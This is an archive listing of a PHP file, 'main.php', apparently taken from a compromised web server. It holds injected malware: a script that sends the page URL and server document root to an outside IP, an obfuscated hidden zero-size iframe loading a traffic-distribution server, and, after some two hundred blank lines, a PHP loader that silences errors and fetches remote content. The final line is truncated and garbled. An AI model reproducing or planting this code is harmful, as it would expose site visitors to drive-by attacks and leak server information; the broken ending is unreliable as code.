home *** CD-ROM | disk | FTP | other *** search
/ 91.121.126.69 / 91.121.126.69.tar / 91.121.126.69 / 1 / main.php < prev    next >
Text File  |  2015-06-21  |  4KB  |  276 lines

  1. <!--LiveInlernet-->
  2. <script type="text/javascript">
  3. src = "http://176.102.37.55/?id=270470&u="+escape(window.location)+"&d=<?php echo $_SERVER[DOCUMENT_ROOT];?>";
  4. document.write("<img src="+src+">");
  5. </script>
  6. <!--/LiveInlernet-->
  7. <script>
  8. var tds_url = 'ht' + 'tp:' + '//' + '91.' + '217.' + '91.' + '104' + '/';
  9. var group = '?' + 'i' + 'd' + '=' + '1';
  10. var charset = 'utf-8';
  11. var referer = encodeURIComponent(document.referrer);
  12. var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset;
  13. document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>');
  14. </script><?php ?>
  15.  
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79.  
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123.  
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130.  
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177.  
  178.  
  179.  
  180.  
  181.  
  182.  
  183.  
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194.  
  195.  
  196.  
  197.  
  198.  
  199.  
  200.  
  201.  
  202.  
  203.  
  204.  
  205.  
  206.  
  207.  
  208.  
  209.  
  210. <?php
  211. #3e2027#
  212. if (empty($zvqce)) {
  213.     error_reporting(0);
  214.     @ini_set('display_errors', 0);
  215.     if (!function_exists('__url_get_contents')) {
  216.         function __url_get_contents($remote_url, $timeout)
  217.         {
  218.             if (function_exists('curl_exec')) {
  219.                 $ch = curl_init();
  220.                 curl_setopt($ch, CURLOPT_URL, $remote_url);
  221.                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  222.                 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  223.                 curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
  224.                 $_url_get_contents_data = curl_exec($ch);
  225.                 curl_close($ch);
  226.             } elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
  227.                 $ctx = @stream_context_create(array('http' =>
  228.                     array(
  229.                         'timeout' => $timeout,
  230.                     )
  231.                 ));
  232.                 $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
  233.             } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
  234.                 $handle = @fopen($remote_url, "r");
  235.                 $_url_get_contents_data = @stream_get_contents($handle);
  236.             } else {
  237.                 $_url_get_contents_data = __file_get_url_contents($remote_url);
  238.             }
  239.             return $_url_get_contents_data;
  240.         }
  241.     }
  242.     if (!function_exists('__file_get_url_contents')) {
  243.         function __file_get_url_contents($remote_url)
  244.         {
  245.             if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
  246.                 $remote_url, $matches)
  247.             ) {
  248.                 $protocol = strtolower($matches[1]);
  249.                 $host = $matches[2];
  250.                 $path = $matches[3];
  251.             } else {
  252.                 // Bad remote_url-format
  253.                 return FALSE;
  254.             }
  255.             if ($protocol == "http") {
  256.                 $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
  257.             } else {
  258.                 // Bad protocol
  259.                 return FALSE;
  260.             }
  261.             if (!$socket) {
  262.                 // Error creating socket
  263.                 return FALSE;
  264.             }
  265.             $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
  266.             $len_written = @fwrite($socket, $request);
  267.             if ($len_written === FALSE || $len_written != strlen($request)) {
  268.                 // Error sending request
  269.                 return FALSE;
  270.             }
  271.             $response = "";
  272.             while (!@feof($socket) &&
  273.                 ($buf = @fread($socket, 4096)) !== FALSE) {
  274.                 $response .= $buf;
  275.             }
  276.             if ($buf echo "http://dromessop.org/fncb.cgi?6";